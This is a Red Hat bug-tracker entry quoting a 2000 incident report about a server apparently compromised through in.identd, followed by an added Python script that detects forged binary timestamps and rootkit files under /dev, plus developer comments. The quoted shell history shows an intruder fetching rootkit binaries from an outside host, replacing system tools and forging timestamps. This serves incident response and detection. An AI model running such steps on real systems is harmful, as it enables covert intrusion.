Bug 10941 - Rooted through in.identd on Red Hat 6.0
Status: CLOSED NOTABUG
Product: Red Hat Linux
Classification: Retired
Component: inetd
Version: 6.0
Platform: All Linux
Priority: medium, Severity: medium
Assigned To: Trond Eivind Glomsrød
Reported: 2000-04-20 08:07 EDT by smedina
Modified: 2008-05-01 11:37 EDT
Last Closed: 2001-01-19 16:15:46 EST
Description smedina 2000-04-20 08:07:20 EDT
-----Original Message-----
From: Del Elson [mailto:del@BABEL.COM.AU]
Sent: Wednesday, April 19, 2000 1:02 AM
To: INCIDENTS@SECURITYFOCUS.COM
Subject: Rooted through in.identd on Red Hat 6.0


Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del
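The history quoted above shows two track-covering moves that are cheap to test for on a suspect host: forged modification times on replaced system binaries (`touch -t` rewrites atime/mtime, but the kernel stamps ctime with the current time on every inode change, so the two drift far apart), and rootkit configuration hidden as plain files under /dev. The Python script below is an added example written for this page, not code from the original post or from Red Hat; it builds a constructed sample tree in a temporary directory (the `bin`/`dev` layout and the `ps`, `ls`, `cui220` names are assumptions that mirror the report) and reports what each check flags.

```python
"""Added host checks inspired by the quoted .bash_history.
Not part of the original bug report or the list post.

Two indicators of the track-covering seen in the report:
  1. `touch -t` rewrites atime/mtime only; the kernel sets ctime to
     the current time on every inode change, so a timestomped binary
     shows a ctime far newer than its mtime.
  2. /dev should hold device nodes, symlinks and directories; plain
     files there (/dev/cui220, /dev/cui221 in the report) are a
     classic rootkit configuration location.

The sample tree is constructed in a temporary directory; the names
inside it are assumptions mirroring the report.
"""
import os
import stat
import tempfile
import time

# The forged timestamp the intruder used: 1999-10-12 21:10 (local time)
FORGED_MTIME = time.mktime((1999, 10, 12, 21, 10, 0, 0, 0, -1))
# Flag a file if its ctime is more than this much newer than its mtime
CTIME_GAP_SECONDS = 30 * 24 * 3600


def find_timestomped(dirs, gap=CTIME_GAP_SECONDS):
    """Return paths of regular files whose ctime is far newer than mtime."""
    hits = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            st = os.lstat(p)
            if stat.S_ISREG(st.st_mode) and st.st_ctime - st.st_mtime > gap:
                hits.append(p)
    return hits


def find_regular_files(dev_dir):
    """Return paths of plain files living in a device directory."""
    hits = []
    for name in sorted(os.listdir(dev_dir)):
        p = os.path.join(dev_dir, name)
        if stat.S_ISREG(os.lstat(p).st_mode):
            hits.append(p)
    return hits


def build_sample_tree():
    """Constructed sample: one legitimate binary, one replaced and
    timestomped binary, and a dev directory with a symlink, a subdir
    and a rootkit-style config file."""
    root = tempfile.mkdtemp(prefix="identd-ir-")
    bin_dir = os.path.join(root, "bin")
    dev_dir = os.path.join(root, "dev")
    os.makedirs(bin_dir)
    os.makedirs(dev_dir)

    # Legitimate binary: mtime and ctime are both "now", nothing to flag
    with open(os.path.join(bin_dir, "ls"), "wb") as f:
        f.write(b"#!/bin/sh\necho ls\n")

    # Replaced binary: copied in, then `touch -t 199910122110` run on it
    trojan = os.path.join(bin_dir, "ps")
    with open(trojan, "wb") as f:
        f.write(b"#!/bin/sh\necho replaced ps\n")
    os.utime(trojan, (FORGED_MTIME, FORGED_MTIME))  # atime/mtime forged, ctime = now

    # dev contents: the symlink and directory are normal, the plain file is not
    os.symlink("/proc/self/fd", os.path.join(dev_dir, "fd"))
    os.makedirs(os.path.join(dev_dir, "pts"))
    with open(os.path.join(dev_dir, "cui220"), "w") as f:
        f.write("2 sh\n2 slice2\n")  # hidden-process list, as in the report

    return root


def run_demo():
    """Build the sample tree, run both checks, return flagged basenames."""
    root = build_sample_tree()
    stomped = [os.path.basename(p) for p in find_timestomped([os.path.join(root, "bin")])]
    devfiles = [os.path.basename(p) for p in find_regular_files(os.path.join(root, "dev"))]
    return stomped, devfiles


if __name__ == "__main__":
    stomped, devfiles = run_demo()
    print("timestomped binaries:", stomped)
    print("plain files under dev:", devfiles)
```

Run directly, it reports `ps` as timestomped and `cui220` as a plain file in the device directory. On a real host, point `find_timestomped` at /bin, /sbin, /usr/bin and /usr/sbin and `find_regular_files` at /dev, and pair both with `rpm -V`, whose checksum comparison would also expose the replaced ps, netstat, syslogd, tcpd and pstree regardless of their timestamps.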
Comment 1 Jeff Johnson 2000-05-11 12:46:59 EDT
Why do you think the exploit is in.identd? Because of the messages?
/usr/sbin/inetd is a much likelier target, but I don't know of any
current exploits there.
Comment 2 Pekka Savola 2000-05-11 14:07:59 EDT
I fear some by-default inetd-enabled services e.g. in.telnetd still have
a hole in them.

Please see my report #10860.
Comment 3 Trond Eivind Glomsrød 2001-01-19 19:57:02 EST
Still no sign of bugs in identd (which at least now runs as nobody or ident
anyway)... closing.
